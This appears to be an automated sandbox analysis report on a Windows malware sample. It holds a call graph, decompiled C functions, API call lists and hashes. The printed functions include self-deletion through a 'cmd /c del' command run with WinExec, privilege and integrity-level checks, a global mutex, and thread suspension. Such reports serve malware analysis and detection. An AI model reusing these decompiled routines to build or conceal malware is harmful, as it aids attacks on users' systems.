1477->1491 1479 d31ad2 VirtualAlloc 1478->1479 1478->1491 1480 d31af4 VirtualAlloc 1479->1480 1481 d31b0c 1479->1481 1480->1481 1481->1491 1496 d314f3 VirtualAlloc 1481->1496 1483 d31b20 VirtualAlloc VirtualAlloc 1484 d31b88 1483->1484 1497 d3171c 1484->1497 1486 d31baf 1502 d31903 1486->1502 1493 d314d8 1491->1493 1492 d31bd4 1492->1491 1515 d31a23 1492->1515 1494 d314f0 1493->1494 1495 d314df VirtualFree 1493->1495 1494->1469 1495->1494 1496->1483 1500 d31742 1497->1500 1501 d317b8 1497->1501 1498 d3177f VirtualAlloc 1498->1500 1499 d31762 VirtualAlloc 1499->1500 1500->1498 1500->1499 1500->1501 1501->1486 1503 d31927 IsBadReadPtr 1502->1503 1505 d31a13 1502->1505 1503->1505 1508 d31941 1503->1508 1504 d31957 LoadLibraryA 1504->1505 1504->1508 1505->1492 1510 d317bf 1505->1510 1507 d319f8 IsBadReadPtr 1507->1505 1507->1508 1508->1504 1508->1505 1508->1507 1509 d319cb GetProcAddress 1508->1509 1525 d31509 1508->1525 1509->1508 1513 d3187d 1510->1513 1514 d317e1 1510->1514 1511 d31804 VirtualFree 1511->1514 1512 d31852 VirtualProtect 1512->1513 1512->1514 1513->1492 1514->1511 1514->1512 1514->1513 1516 d31a8f 1515->1516 1517 d31a2f 1515->1517 1516->1491 1518 d31a74 1517->1518 1521 d31a6c 1517->1521 1523 d31a5e FreeLibrary 1517->1523 1519 d31a89 1518->1519 1520 d31a7c VirtualFree 1518->1520 1522 d314d8 VirtualFree 1519->1522 1520->1519 1524 d314d8 VirtualFree 1521->1524 1522->1516 1523->1517 1524->1518 1526 d31515 1525->1526 1528 d3151b 1525->1528 1533 d314b2 1526->1533 1530 d31522 1528->1530 1536 d314f3 VirtualAlloc 1528->1536 1530->1508 1531 d31532 1531->1530 1532 d314d8 VirtualFree 1531->1532 1532->1530 1534 d314c2 VirtualQuery 1533->1534 1535 d314be 1533->1535 1534->1535 1535->1528 1536->1531 1538 d3288e GetLastError 1537->1538 1539 d3283e Process32First 1537->1539 1542 d31fa4 1538->1542 1540 d32859 1539->1540 1541 d3287f GetLastError 1539->1541 1543 d32875 1540->1543 1544 d32864 Process32Next 1540->1544 1545 d32885 CloseHandle 1541->1545 1542->1275 1546 d31c33 CreateToolhelp32Snapshot 1542->1546 1543->1545 1544->1540 1544->1543 1545->1542 1547 d31c4f Thread32First 1546->1547 1548 d31ccc GetLastError 1546->1548 1549 d31cc0 GetLastError 1547->1549 1553 d31c75 1547->1553 1550 d31cd2 1548->1550 1551 d31cc6 CloseHandle 1549->1551 1550->1275 1551->1550 1552 d31caf Thread32Next 1552->1553 1555 d31cbd 1552->1555 1553->1552 1554 d31c8c OpenThread 1553->1554 1554->1552 1556 d31c9d SuspendThread 1554->1556 1555->1551 1557 d31ca9 1556->1557 1558 d31cac CloseHandle 1556->1558 1557->1558 1558->1552 1559 d33c90 IsProcessorFeaturePresent 1568 d33e80 GetPEB 1560 d31bd6 1561 d31c25 1560->1561 1562 d31a23 3 API calls 1561->1562 1563 d31c2d 1562->1563

    Callgraph

    • Executed
    • Not Executed
    • Opacity -> Relevance
    • Disassembly available
    callgraph 0 Function_00D31553 1 Function_00D33A50 2 Function_00D33B50 3 Function_00D313D0 7 Function_00D314D8 3->7 18 Function_00D314F3 3->18 36 Function_00D31A94 3->36 44 Function_00D3159C 3->44 54 Function_00D31705 3->54 4 Function_00D33A57 5 Function_00D31BD6 74 Function_00D31A23 5->74 6 Function_00D31CDA 9 Function_00D32BDC 6->9 10 Function_00D322DC 6->10 11 Function_00D33143 6->11 12 Function_00D329C6 6->12 32 Function_00D33510 6->32 43 Function_00D3289C 6->43 50 Function_00D32481 6->50 53 Function_00D33E87 6->53 60 Function_00D32308 6->60 63 Function_00D3250C 6->63 69 Function_00D31434 6->69 8 Function_00D327DD 21 Function_00D32AF9 9->21 23 Function_00D33A60 9->23 40 Function_00D3259B 9->40 49 Function_00D32F02 9->49 9->63 76 Function_00D33620 9->76 77 Function_00D324AA 9->77 30 Function_00D32291 10->30 11->2 11->8 15 Function_00D320CE 11->15 16 Function_00D330CD 11->16 25 Function_00D33065 11->25 27 Function_00D320EC 11->27 37 Function_00D32194 11->37 11->49 57 Function_00D32104 11->57 11->63 11->76 11->77 12->32 13 Function_00D338C5 14 Function_00D325CB 14->76 15->32 17 Function_00D3214C 17->27 19 Function_00D33770 20 Function_00D338F4 29 Function_00D33E92 21->29 21->32 42 Function_00D33E9D 21->42 22 Function_00D32062 24 Function_00D31467 25->15 26 Function_00D321ED 26->53 28 Function_00D3396C 29->22 30->32 55 Function_00D32604 30->55 31 Function_00D33A11 33 Function_00D33590 34 Function_00D33C90 35 Function_00D33896 36->18 45 Function_00D3171C 36->45 47 Function_00D31903 36->47 56 Function_00D31884 36->56 58 Function_00D31489 36->58 72 Function_00D317BF 36->72 36->74 37->27 38 Function_00D31C14 38->74 39 Function_00D33794 41 Function_00D31E99 41->8 41->14 41->33 41->43 64 Function_00D31C33 41->64 70 Function_00D321BB 41->70 75 Function_00D32822 41->75 61 Function_00D32088 42->61 43->32 44->0 48 Function_00D31583 44->48 45->24 45->58 46 Function_00D3391C 59 Function_00D31509 47->59 48->0 49->15 49->17 49->27 49->37 78 Function_00D320AE 49->78 50->26 51 Function_00D32001 52 Function_00D33E80 73 Function_00D3203C 53->73 55->32 57->27 59->7 59->18 59->58 66 Function_00D314B2 59->66 60->10 60->31 60->32 60->51 62 Function_00D32E88 65 Function_00D31FB2 65->6 65->41 67 Function_00D336B0 68 Function_00D33DB5 69->3 69->30 70->27 71 Function_00D33738 74->7

    Executed Functions

    Control-flow Graph

    C-Code - Quality: 81%
    			E00D32604(intOrPtr* _a4, void* _a8) {
    				void* _v8;
    				int _v12;
    				void* _v16;
    				_Unknown_base(*)()* _v20;
    				short _v24;
    				struct _SID_IDENTIFIER_AUTHORITY _v28;
    				short _v32;
    				struct _SID_IDENTIFIER_AUTHORITY _v36;
    				void* _v40;
    				intOrPtr _v44;
    				int _v48;
    				int _v60;
    				long _v64;
    				char _v68;
    				char* _t49;
    				void* _t52;
    				_Unknown_base(*)()* _t61;
    				intOrPtr* _t62;
    				struct _ACL* _t82;
    
    				_v28.Value = 0;
    				_v24 = 0x100;
    				_v16 = 0;
    				if(AllocateAndInitializeSid( &_v28, 1, 0, 0, 0, 0, 0, 0, 0, 0,  &_v16) == 0) {
    					GetLastError();
    					L22:
    					return 0;
    				}
    				_v12 = 0;
    				E00D33510( &_v68, 0, 0x20);
    				_v68 = _a8;
    				_v40 = _v16;
    				_t49 =  &_v68;
    				_v64 = 2;
    				_v60 = 0;
    				_v48 = 0;
    				_v44 = 5;
    				__imp__SetEntriesInAclA(1, _t49, 0,  &_v12); // executed
    				if(_t49 != 0) {
    					GetLastError();
    					L20:
    					FreeSid(_v16);
    					goto L22;
    				}
    				_t52 = LocalAlloc(0x40, 0x14);
    				_a8 = _t52;
    				if(_t52 == 0) {
    					GetLastError();
    					L18:
    					LocalFree(_v12);
    					goto L20;
    				}
    				E00D33510(_t52, 0, 0x14);
    				if(InitializeSecurityDescriptor(_a8, 1) == 0 || SetSecurityDescriptorDacl(_a8, 1, _v12, 0) == 0) {
    					GetLastError();
    					LocalFree(_a8);
    					goto L18;
    				} else {
    					_v36.Value = 0;
    					_v32 = 0x1000;
    					_t61 = GetProcAddress(LoadLibraryA("advapi32.dll"), "AddMandatoryAce");
    					_v20 = _t61;
    					if(_t61 == 0) {
    						L15:
    						_t62 = _a4;
    						 *_t62 = 0xc;
    						 *((intOrPtr*)(_t62 + 4)) = _a8;
    						 *((intOrPtr*)(_t62 + 8)) = 0;
    						return 1;
    					}
    					_t82 = LocalAlloc(0x40, 0x200);
    					if(_t82 == 0) {
    						GetLastError();
    						goto L15;
    					}
    					if(InitializeAcl(_t82, 0x200, 2) == 0) {
    						L12:
    						GetLastError();
    						L13:
    						LocalFree(_t82);
    						goto L15;
    					}
    					_v8 = 0;
    					if(AllocateAndInitializeSid( &_v36, 1, 0x1000, 0, 0, 0, 0, 0, 0, 0,  &_v8) == 0) {
    						goto L12;
    					}
    					_push(_v8);
    					_push(1);
    					_push(0);
    					_push(2);
    					_push(_t82);
    					if(_v20() == 0 || SetSecurityDescriptorSacl(_a8, 1, _t82, 0) == 0) {
    						GetLastError();
    						FreeSid(_v8);
    						goto L13;
    					} else {
    						goto L15;
    					}
    				}
    			}






















    0x00d32621
    0x00d32624
    0x00d3262a
    0x00d32635
    0x00d327ce
    0x00d327d4
    0x00000000
    0x00d327d4
    0x00d32642
    0x00d32645
    0x00d3264d
    0x00d32656
    0x00d3265e
    0x00d32664
    0x00d3266b
    0x00d3266e
    0x00d32671
    0x00d32678
    0x00d32680
    0x00d327bd
    0x00d327c3
    0x00d327c6
    0x00000000
    0x00d327c6
    0x00d32690
    0x00d32698
    0x00d3269d
    0x00d327b0
    0x00d327b6
    0x00d327b9
    0x00000000
    0x00d327b9
    0x00d326a7
    0x00d326bc
    0x00d327a3
    0x00d327ac
    0x00000000
    0x00d326d9
    0x00d326e3
    0x00d326e6
    0x00d326f3
    0x00d326f9
    0x00d326fe
    0x00d3278c
    0x00d3278c
    0x00d32792
    0x00d32798
    0x00d3279b
    0x00000000
    0x00d327a0
    0x00d3270e
    0x00d32712
    0x00d32786
    0x00000000
    0x00d32786
    0x00d32720
    0x00d32777
    0x00d32777
    0x00d3277d
    0x00d3277e
    0x00000000
    0x00d3277e
    0x00d32738
    0x00d32743
    0x00000000
    0x00000000
    0x00d32745
    0x00d32748
    0x00d3274a
    0x00d3274b
    0x00d3274d
    0x00d32753
    0x00d32766
    0x00d3276f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d32753

    APIs
    • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00D322B7,00000000,00000000,00000000), ref: 00D3262D
    • _memset.LIBCMT ref: 00D32645
    • SetEntriesInAclA.ADVAPI32(00000001,?,00000000,7622DAA3), ref: 00D32678
    • LocalAlloc.KERNEL32(00000040,00000014), ref: 00D32690
    • _memset.LIBCMT ref: 00D326A7
    • InitializeSecurityDescriptor.ADVAPI32(00D322B7,00000001), ref: 00D326B4
    • SetSecurityDescriptorDacl.ADVAPI32(00D322B7,00000001,7622DAA3,00000000), ref: 00D326CB
    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00D326EC
    • GetProcAddress.KERNEL32(00000000), ref: 00D326F3
    • LocalAlloc.KERNEL32(00000040,00000200), ref: 00D3270C
    • InitializeAcl.ADVAPI32(00000000,00000200,00000002), ref: 00D32718
    • AllocateAndInitializeSid.ADVAPI32(?,00000001,00001000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,001F0001), ref: 00D3273B
    • SetSecurityDescriptorSacl.ADVAPI32(00D322B7,00000001,00000000,00000000), ref: 00D3275C
    • GetLastError.KERNEL32 ref: 00D32766
    • FreeSid.ADVAPI32(001F0001), ref: 00D3276F
    • GetLastError.KERNEL32 ref: 00D32777
    • LocalFree.KERNEL32(00000000), ref: 00D3277E
    • GetLastError.KERNEL32 ref: 00D32786
    • GetLastError.KERNEL32 ref: 00D327A3
    • LocalFree.KERNEL32(00D322B7), ref: 00D327AC
    • GetLastError.KERNEL32 ref: 00D327B0
    • LocalFree.KERNEL32(7622DAA3), ref: 00D327B9
    • GetLastError.KERNEL32 ref: 00D327BD
    • FreeSid.ADVAPI32(00D322B7), ref: 00D327C6
    • GetLastError.KERNEL32 ref: 00D327CE
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: ErrorLast$FreeLocal$Initialize$DescriptorSecurity$AllocAllocate_memset$AddressDaclEntriesLibraryLoadProcSacl
    • String ID: AddMandatoryAce$advapi32.dll
    • API String ID: 922488538-673174713
    • Opcode ID: 3b17eda184c87a2fa93c0ec89568f42be650c7a07947c3e7b0583bb628d716f3
    • Instruction ID: f02ec95507a39ab876f41224488f05988762c246a84deec7d32a8a3f14f9b674
    • Opcode Fuzzy Hash: 3b17eda184c87a2fa93c0ec89568f42be650c7a07947c3e7b0583bb628d716f3
    • Instruction Fuzzy Hash: B45108B9E0030AAFDB149FA5DC89AEE7BB8FF04751F144029F605E6250D7B48A80DB71
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 70%
    			E00D329C6() {
    				int _t32;
    				int _t39;
    				void* _t47;
    				void* _t51;
    				int _t57;
    				void* _t63;
    				void* _t65;
    
    				_t63 = _t65 - 0x78;
    				_t57 = 0;
    				E00D33510(_t63 - 0x3c, 0, 0x9c);
    				 *(_t63 - 0x3c) = 0x9c;
    				_t32 = GetVersionExA(_t63 - 0x3c);
    				if(_t32 != 0) {
    					if( *((intOrPtr*)(_t63 - 0x2c)) != 2 ||  *((intOrPtr*)(_t63 - 0x38)) < 6) {
    						__imp__#680();
    					} else {
    						 *(_t63 + 0x74) = 0;
    						if(OpenProcessToken(GetCurrentProcess(), 8, _t63 + 0x74) == 0) {
    							GetLastError();
    							goto L18;
    						} else {
    							 *(_t63 + 0x68) = 0;
    							_t39 = GetTokenInformation( *(_t63 + 0x74), 0x12, _t63 + 0x60, 4, _t63 + 0x68); // executed
    							if(_t39 != 0) {
    								if( *(_t63 + 0x60) != 3) {
    									__imp__#680();
    									_t57 = _t39;
    									goto L16;
    								} else {
    									 *(_t63 + 0x70) = 0;
    									if(GetTokenInformation( *(_t63 + 0x74), 0x13, _t63 + 0x70, 4, _t63 + 0x68) == 0) {
    										goto L7;
    									} else {
    										_t47 = _t63 - 0x80;
    										 *((intOrPtr*)(_t63 + 0x64)) = 0x44;
    										__imp__CreateWellKnownSid(0x1a, 0, _t47, _t63 + 0x64);
    										if(_t47 == 0) {
    											L13:
    											GetLastError();
    										} else {
    											_t51 = _t63 - 0x80;
    											 *(_t63 + 0x6c) = 0;
    											__imp__CheckTokenMembership( *(_t63 + 0x70), _t51, _t63 + 0x6c);
    											if(_t51 == 0) {
    												goto L13;
    											} else {
    												_t57 =  *(_t63 + 0x6c);
    											}
    										}
    										CloseHandle( *(_t63 + 0x70));
    										L16:
    										CloseHandle( *(_t63 + 0x74));
    										L18:
    										_t32 = _t57;
    									}
    								}
    							} else {
    								L7:
    								GetLastError();
    								CloseHandle( *(_t63 + 0x74));
    								goto L2;
    							}
    						}
    					}
    				} else {
    					GetLastError();
    					L2:
    					_t32 = 0;
    				}
    				return _t32;
    			}










    0x00d329c7
    0x00d329da
    0x00d329e1
    0x00d329ed
    0x00d329f0
    0x00d329f8
    0x00d32a0b
    0x00d32aeb
    0x00d32a1b
    0x00d32a21
    0x00d32a33
    0x00d32ae1
    0x00000000
    0x00d32a39
    0x00d32a4e
    0x00d32a51
    0x00d32a55
    0x00d32a72
    0x00d32ad2
    0x00d32ad8
    0x00000000
    0x00d32a74
    0x00d32a83
    0x00d32a8a
    0x00000000
    0x00d32a8c
    0x00d32a90
    0x00d32a97
    0x00d32a9e
    0x00d32aa6
    0x00d32ac5
    0x00d32ac5
    0x00d32aa8
    0x00d32aac
    0x00d32ab3
    0x00d32ab6
    0x00d32abe
    0x00000000
    0x00d32ac0
    0x00d32ac0
    0x00d32ac0
    0x00d32abe
    0x00d32ace
    0x00d32ada
    0x00d32add
    0x00d32ae7
    0x00d32ae7
    0x00d32ae7
    0x00d32a8a
    0x00d32a57
    0x00d32a57
    0x00d32a57
    0x00d32a60
    0x00000000
    0x00d32a60
    0x00d32a55
    0x00d32a33
    0x00d329fa
    0x00d329fa
    0x00d32a00
    0x00d32a00
    0x00d32a00
    0x00d32af8

    APIs
    • _memset.LIBCMT ref: 00D329E1
    • GetVersionExA.KERNEL32(?,?,?), ref: 00D329F0
    • GetLastError.KERNEL32(?,?), ref: 00D329FA
    • GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00D32A24
    • OpenProcessToken.ADVAPI32(00000000,?,?), ref: 00D32A2B
    • GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?,?,?), ref: 00D32A51
    • GetLastError.KERNEL32(?,?), ref: 00D32A57
    • CloseHandle.KERNEL32(?), ref: 00D32A60
    • GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?,?,?), ref: 00D32A86
    • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?,?,?), ref: 00D32A9E
    • CheckTokenMembership.ADVAPI32(?,?,?,?,?), ref: 00D32AB6
    • GetLastError.KERNEL32(?,?), ref: 00D32AC5
    • CloseHandle.KERNEL32(?), ref: 00D32ACE
    • IsUserAnAdmin.SHELL32 ref: 00D32AD2
    • CloseHandle.KERNEL32(?), ref: 00D32ADD
    • GetLastError.KERNEL32(?,?), ref: 00D32AE1
    • IsUserAnAdmin.SHELL32 ref: 00D32AEB
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: ErrorLastToken$CloseHandle$AdminInformationProcessUser$CheckCreateCurrentKnownMembershipOpenVersionWell_memset
    • String ID: rG>v
    • API String ID: 3265022410-1829036858
    • Opcode ID: 0f6d42e78d4de839175190394cc57fb47a1ce715a59bf13acf9639b81b1e8dc8
    • Instruction ID: 7e838601590c2524cc8dc5a4ec026afe9e9cb4f2630cebf0a0ce3e1669b5a6de
    • Opcode Fuzzy Hash: 0f6d42e78d4de839175190394cc57fb47a1ce715a59bf13acf9639b81b1e8dc8
    • Instruction Fuzzy Hash: DC311276D4030AEBDB219FA1DD48AEE3BA8FB08351F144026FA11D2261EB30C849DB71
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 100%
    			E00D3289C() {
    				intOrPtr _t23;
    				int _t32;
    				int _t39;
    				long _t51;
    				void* _t62;
    				void* _t63;
    				void* _t65;
    
    				_t63 = _t65 - 0x70;
    				_t51 =  *(_t63 + 0x7c);
    				 *((intOrPtr*)(_t63 + 0x68)) = 0;
    				 *(_t63 + 0x6c) = 0;
    				if(_t51 == 0) {
    					L17:
    					_t23 = 0;
    				} else {
    					 *_t51 = 0;
    					E00D33510(_t63 - 0x34, 0, 0x9c);
    					 *(_t63 - 0x34) = 0x9c;
    					if(GetVersionExA(_t63 - 0x34) != 0) {
    						L3:
    						if( *((intOrPtr*)(_t63 - 0x30)) < 6) {
    							goto L17;
    						} else {
    							if(OpenProcessToken( *(_t63 + 0x78), 0x18, _t63 + 0x6c) == 0) {
    								GetLastError();
    							} else {
    								 *(_t63 + 0x7c) = 0;
    								_t32 = GetTokenInformation( *(_t63 + 0x6c), 0x19, 0, 0, _t63 + 0x7c); // executed
    								if(_t32 != 0) {
    									L13:
    									GetLastError();
    								} else {
    									if(GetLastError() != 0x7a) {
    										GetLastError();
    									} else {
    										_t62 = LocalAlloc(0x40,  *(_t63 + 0x7c));
    										if(_t62 == 0) {
    											goto L13;
    										} else {
    											_t39 = GetTokenInformation( *(_t63 + 0x6c), 0x19, _t62,  *(_t63 + 0x7c), _t63 + 0x7c); // executed
    											if(_t39 == 0) {
    												GetLastError();
    											} else {
    												 *_t51 =  *(GetSidSubAuthority( *_t62,  *(GetSidSubAuthorityCount( *_t62)) - 0x00000001 & 0x000000ff));
    												 *((intOrPtr*)(_t63 + 0x68)) = 1;
    											}
    											LocalFree(_t62);
    										}
    									}
    								}
    								CloseHandle( *(_t63 + 0x6c));
    							}
    							_t23 =  *((intOrPtr*)(_t63 + 0x68));
    						}
    					} else {
    						 *(_t63 - 0x34) = 0x94;
    						if(GetVersionExA(_t63 - 0x34) == 0) {
    							goto L17;
    						} else {
    							goto L3;
    						}
    					}
    				}
    				return _t23;
    			}










    0x00d3289d
    0x00d328a8
    0x00d328af
    0x00d328b2
    0x00d328b7
    0x00d329ba
    0x00d329ba
    0x00d328bd
    0x00d328c8
    0x00d328ca
    0x00d328d5
    0x00d328e3
    0x00d328fa
    0x00d328fe
    0x00000000
    0x00d32904
    0x00d32915
    0x00d329af
    0x00d3291b
    0x00d32926
    0x00d3292f
    0x00d32933
    0x00d3299e
    0x00d3299e
    0x00d32935
    0x00d32940
    0x00d3299a
    0x00d32942
    0x00d3294d
    0x00d32951
    0x00000000
    0x00d32953
    0x00d32960
    0x00d32964
    0x00d3298b
    0x00d32966
    0x00d32980
    0x00d32982
    0x00d32982
    0x00d32992
    0x00d32992
    0x00d32951
    0x00d32940
    0x00d329a7
    0x00d329a7
    0x00d329b5
    0x00d329b5
    0x00d328e5
    0x00d328e9
    0x00d328f4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00d328f4
    0x00d328e3
    0x00d329c3

    APIs
    • _memset.LIBCMT ref: 00D328CA
    • GetVersionExA.KERNEL32(?,00000000,7622DF30,00000000), ref: 00D328DF
    • GetVersionExA.KERNEL32(?), ref: 00D328F0
    • OpenProcessToken.ADVAPI32(?,00000018,?), ref: 00D3290D
    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00D3292F
    • GetLastError.KERNEL32 ref: 00D3293B
    • LocalAlloc.KERNEL32(00000040,?), ref: 00D32947
    • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00D32960
    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00D32968
    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00D32978
    • GetLastError.KERNEL32 ref: 00D3298B
    • LocalFree.KERNEL32(00000000), ref: 00D32992
    • GetLastError.KERNEL32 ref: 00D3299A
    • GetLastError.KERNEL32 ref: 00D3299E
    • CloseHandle.KERNEL32(?), ref: 00D329A7
    • GetLastError.KERNEL32 ref: 00D329AF
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: ErrorLast$Token$AuthorityInformationLocalVersion$AllocCloseCountFreeHandleOpenProcess_memset
    • String ID:
    • API String ID: 1389885952-0
    • Opcode ID: 5ef7d453a55d31ab4f5b8f14c26cbfe8c80b67ac42c2121ecb3d6d931ad00c94
    • Instruction ID: aa62d39dcf24e6fb8688a136241fe80df1d82dfde61290e5263c8fa5ca21d099
    • Opcode Fuzzy Hash: 5ef7d453a55d31ab4f5b8f14c26cbfe8c80b67ac42c2121ecb3d6d931ad00c94
    • Instruction Fuzzy Hash: 5131397A94031AAFEB209FA5EC44BAE7BB9EF48351F240021F954D2220D7719945DFB1
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 75%
    			E00D321ED() {
    				char _v264;
    				char _v524;
    				long _t11;
    				int _t22;
    
    				_t11 = GetModuleFileNameA(0,  &_v264, 0x104);
    				if(_t11 != 0) {
    					_t11 = GetShortPathNameA( &_v264,  &_v264, 0x104); // executed
    					if(_t11 != 0) {
    						_push( &_v264);
    						_push("/c del %s >> NUL");
    						_push( &_v524);
    						E00D33E87();
    						_t11 = GetEnvironmentVariableA("ComSpec",  &_v264, 0x104);
    						if(_t11 != 0) {
    							lstrcatA( &_v264, " ");
    							lstrcatA( &_v264,  &_v524);
    							_t22 = WinExec( &_v264, 0); // executed
    							return _t22;
    						}
    					}
    				}
    				return _t11;
    			}







    0x00d32206
    0x00d3220e
    0x00d32219
    0x00d32221
    0x00d32229
    0x00d32230
    0x00d32235
    0x00d32236
    0x00d3224b
    0x00d32253
    0x00d32267
    0x00d32277
    0x00d32282
    0x00000000
    0x00d32282
    0x00d32253
    0x00d32221
    0x00d3228a

    APIs
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,7622DAA3), ref: 00D32206
    • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 00D32219
    • GetEnvironmentVariableA.KERNEL32(ComSpec,?,00000104), ref: 00D3224B
    • lstrcatA.KERNEL32(?,00D311F0), ref: 00D32267
    • lstrcatA.KERNEL32(?,?), ref: 00D32277
    • WinExec.KERNEL32(?,00000000), ref: 00D32282
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: Namelstrcat$EnvironmentExecFileModulePathShortVariable
    • String ID: /c del %s >> NUL$ComSpec
    • API String ID: 4034038632-4153267903
    • Opcode ID: 27252dba8271332a274d05ec303bf791cd136cc5da33642f51e42e948097d791
    • Instruction ID: 7b4b1cf393e06bac434f00170646d13468789680d353c4311961f061a1346156
    • Opcode Fuzzy Hash: 27252dba8271332a274d05ec303bf791cd136cc5da33642f51e42e948097d791
    • Instruction Fuzzy Hash: 7E01C4BAD003296BDB5097A0AD89FDB776C9B14741F040191BA45E2144DA70DBC48B71
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 81 d32291-d322b9 call d33510 call d32604 86 d322d7-d322db 81->86 87 d322bb-d322cf CreateMutexA 81->87 87->86 88 d322d1 GetLastError 87->88 88->86
    C-Code - Quality: 100%
    			E00D32291(void* __eflags) {
    				struct _SECURITY_ATTRIBUTES _v16;
    				void* _t7;
    				void* _t10;
    				void* _t12;
    
    				_t12 = 0;
    				E00D33510( &_v16, 0, 0xc);
    				_t7 = E00D32604( &_v16, 0x1f0001); // executed
    				if(_t7 != 0) {
    					_t10 = CreateMutexA( &_v16, 0, "Global\\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A}"); // executed
    					_t12 = _t10;
    					if(_t12 == 0) {
    						GetLastError();
    					}
    				}
    				return _t12;
    			}







    0x00d3229a
    0x00d322a1
    0x00d322b2
    0x00d322b9
    0x00d322c5
    0x00d322cb
    0x00d322cf
    0x00d322d1
    0x00d322d1
    0x00d322cf
    0x00d322db

    APIs
    • _memset.LIBCMT ref: 00D322A1
      • Part of subcall function 00D32604: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00D322B7,00000000,00000000,00000000), ref: 00D3262D
      • Part of subcall function 00D32604: _memset.LIBCMT ref: 00D32645
      • Part of subcall function 00D32604: SetEntriesInAclA.ADVAPI32(00000001,?,00000000,7622DAA3), ref: 00D32678
      • Part of subcall function 00D32604: LocalAlloc.KERNEL32(00000040,00000014), ref: 00D32690
      • Part of subcall function 00D32604: _memset.LIBCMT ref: 00D326A7
      • Part of subcall function 00D32604: InitializeSecurityDescriptor.ADVAPI32(00D322B7,00000001), ref: 00D326B4
      • Part of subcall function 00D32604: SetSecurityDescriptorDacl.ADVAPI32(00D322B7,00000001,7622DAA3,00000000), ref: 00D326CB
      • Part of subcall function 00D32604: LoadLibraryA.KERNEL32(advapi32.dll), ref: 00D326EC
      • Part of subcall function 00D32604: GetProcAddress.KERNEL32(00000000), ref: 00D326F3
      • Part of subcall function 00D32604: LocalAlloc.KERNEL32(00000040,00000200), ref: 00D3270C
      • Part of subcall function 00D32604: InitializeAcl.ADVAPI32(00000000,00000200,00000002), ref: 00D32718
      • Part of subcall function 00D32604: GetLastError.KERNEL32 ref: 00D32777
      • Part of subcall function 00D32604: LocalFree.KERNEL32(00000000), ref: 00D3277E
      • Part of subcall function 00D32604: GetLastError.KERNEL32 ref: 00D32786
      • Part of subcall function 00D32604: GetLastError.KERNEL32 ref: 00D327A3
      • Part of subcall function 00D32604: LocalFree.KERNEL32(00D322B7), ref: 00D327AC
      • Part of subcall function 00D32604: GetLastError.KERNEL32 ref: 00D327B0
      • Part of subcall function 00D32604: LocalFree.KERNEL32(7622DAA3), ref: 00D327B9
      • Part of subcall function 00D32604: GetLastError.KERNEL32 ref: 00D327BD
      • Part of subcall function 00D32604: FreeSid.ADVAPI32(00D322B7), ref: 00D327C6
      • Part of subcall function 00D32604: GetLastError.KERNEL32 ref: 00D327CE
    • CreateMutexA.KERNELBASE(7622DAA3,00000000,Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A},7622DAA3,001F0001,?,?,00000000,7622DAA3,00D3232C,00000000), ref: 00D322C5
    • GetLastError.KERNEL32(?,?,00000000,7622DAA3,00D3232C,00000000), ref: 00D322D1
    Strings
    • Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A}, xrefs: 00D322BB
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
